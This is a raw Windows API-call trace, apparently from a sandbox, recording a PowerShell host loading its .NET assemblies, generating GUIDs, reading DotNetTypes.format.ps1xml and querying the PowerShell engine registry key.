	[0100.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0100.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0100.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0100.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0100.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0100.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0100.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0100.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0100.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0100.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0100.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0100.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0100.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0100.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0100.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0100.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0100.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0100.811] VirtualQuery (in: lpAddress=0xebd80, lpBuffer=0xecc40, dwLength=0x30 | out: lpBuffer=0xecc40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.813] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3e49b220, Data2=0x1921, Data3=0x4d2f, Data4=([0]=0xb0, [1]=0x3d, [2]=0x9a, [3]=0x7e, [4]=0xb1, [5]=0x69, [6]=0xcd, [7]=0x11))) returned 0x0
	[0100.814] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2c2ffaf0, Data2=0x1003, Data3=0x4206, Data4=([0]=0xac, [1]=0x51, [2]=0x57, [3]=0x63, [4]=0xb7, [5]=0x94, [6]=0x34, [7]=0x1d))) returned 0x0
	[0100.815] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.816] VirtualQuery (in: lpAddress=0xebf30, lpBuffer=0xecdf0, dwLength=0x30 | out: lpBuffer=0xecdf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.817] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf8ddfb5e, Data2=0x51c2, Data3=0x4787, Data4=([0]=0x87, [1]=0xb4, [2]=0x20, [3]=0xdd, [4]=0x2, [5]=0x51, [6]=0x2d, [7]=0x67))) returned 0x0
	[0100.821] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x15662ddd, Data2=0xf431, Data3=0x47cc, Data4=([0]=0x8d, [1]=0xd6, [2]=0xd8, [3]=0x90, [4]=0x8e, [5]=0x7e, [6]=0x4d, [7]=0xfa))) returned 0x0
	[0100.821] VirtualQuery (in: lpAddress=0xec180, lpBuffer=0xed040, dwLength=0x30 | out: lpBuffer=0xed040*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.822] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.822] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.823] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x87940044, Data2=0x81a7, Data3=0x4b80, Data4=([0]=0xb9, [1]=0x92, [2]=0x28, [3]=0x6b, [4]=0x5d, [5]=0x87, [6]=0x77, [7]=0x91))) returned 0x0
	[0100.823] VirtualQuery (in: lpAddress=0xec180, lpBuffer=0xed040, dwLength=0x30 | out: lpBuffer=0xed040*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.895] VirtualQuery (in: lpAddress=0xebfa0, lpBuffer=0xece60, dwLength=0x30 | out: lpBuffer=0xece60*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.895] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.895] VirtualQuery (in: lpAddress=0xeb7f0, lpBuffer=0xec6b0, dwLength=0x30 | out: lpBuffer=0xec6b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.896] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x6136342e, Data2=0x2bd3, Data3=0x4a35, Data4=([0]=0xba, [1]=0xac, [2]=0x2e, [3]=0x36, [4]=0x89, [5]=0x3c, [6]=0x4f, [7]=0x20))) returned 0x0
	[0100.896] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x4f10f5ab, Data2=0xd868, Data3=0x4ad6, Data4=([0]=0xa6, [1]=0x75, [2]=0x65, [3]=0xc0, [4]=0x61, [5]=0x5f, [6]=0xa2, [7]=0x63))) returned 0x0
	[0100.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.897] SetErrorMode (uMode=0x1) returned 0x1
	[0100.897] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0100.897] GetFileType (hFile=0x330) returned 0x1
	[0100.897] SetErrorMode (uMode=0x1) returned 0x1
	[0100.897] GetFileType (hFile=0x330) returned 0x1
	[0100.897] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.898] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.899] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.899] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.900] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.900] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.901] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.901] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.902] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.903] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.903] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.903] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.904] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.904] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.904] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.905] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.907] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0100.907] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0xbce, lpOverlapped=0x0) returned 1
	[0100.908] ReadFile (in: hFile=0x330, lpBuffer=0x34254e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x34254e6*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.908] ReadFile (in: hFile=0x330, lpBuffer=0x3425db0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3425db0*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0100.908] CloseHandle (hObject=0x330) returned 1
	[0100.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.908] SetErrorMode (uMode=0x1) returned 0x1
	[0100.908] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0100.908] SetErrorMode (uMode=0x1) returned 0x1
	[0100.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.909] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x330) returned 0x0
	[0100.909] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0100.909] CoTaskMemAlloc (cb=0x5a) returned 0x1b31bb30
	[0100.909] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x1b31bb30, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0100.909] CoTaskMemFree (pv=0x1b31bb30) 
	[0100.909] RegCloseKey (hKey=0x330) returned 0x0
	[0100.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0100.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0101.027] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x73a67807, Data2=0xaf0a, Data3=0x4e6f, Data4=([0]=0xaa, [1]=0xab, [2]=0x21, [3]=0xb7, [4]=0x12, [5]=0x11, [6]=0x78, [7]=0x8d))) returned 0x0
	[0101.028] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x532bf1bc, Data2=0x5bf7, Data3=0x4e6c, Data4=([0]=0x9e, [1]=0x50, [2]=0x60, [3]=0xbf, [4]=0x63, [5]=0xae, [6]=0xa6, [7]=0x11))) returned 0x0
	[0101.029] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xd1684db8, Data2=0x9316, Data3=0x4e90, Data4=([0]=0xa0, [1]=0x1e, [2]=0x61, [3]=0x33, [4]=0x15, [5]=0x6c, [6]=0xf6, [7]=0x70))) returned 0x0
	[0101.030] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xca12130a, Data2=0x9eab, Data3=0x4f66, Data4=([0]=0xa7, [1]=0xac, [2]=0x34, [3]=0xed, [4]=0xe7, [5]=0x87, [6]=0xc9, [7]=0x76))) returned 0x0
	[0101.030] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xb46e2b0e, Data2=0xbcb8, Data3=0x47bf, Data4=([0]=0x9f, [1]=0x78, [2]=0x3f, [3]=0x73, [4]=0x78, [5]=0x92, [6]=0xcc, [7]=0x7d))) returned 0x0
	[0101.031] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xd15fe6a6, Data2=0x5f61, Data3=0x4e2a, Data4=([0]=0xac, [1]=0x9b, [2]=0x78, [3]=0xa1, [4]=0x24, [5]=0x50, [6]=0xf0, [7]=0xc7))) returned 0x0
	[0101.031] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.032] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x9176412a, Data2=0x38f3, Data3=0x4cdf, Data4=([0]=0xbb, [1]=0x8e, [2]=0xff, [3]=0xab, [4]=0x61, [5]=0xfb, [6]=0xee, [7]=0x87))) returned 0x0
	[0101.033] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.034] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.035] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x153b60e1, Data2=0xa1ec, Data3=0x4fc0, Data4=([0]=0x96, [1]=0xc8, [2]=0x3f, [3]=0x1b, [4]=0x90, [5]=0xeb, [6]=0xe0, [7]=0x66))) returned 0x0
	[0101.035] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x7e6b5217, Data2=0x1b5, Data3=0x44a7, Data4=([0]=0x9e, [1]=0xdb, [2]=0xbb, [3]=0x11, [4]=0x3e, [5]=0xe0, [6]=0xe4, [7]=0xba))) returned 0x0
	[0101.036] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x5a339163, Data2=0x56d0, Data3=0x4c8a, Data4=([0]=0x8f, [1]=0x26, [2]=0x99, [3]=0x5f, [4]=0x64, [5]=0xfe, [6]=0xc, [7]=0xec))) returned 0x0
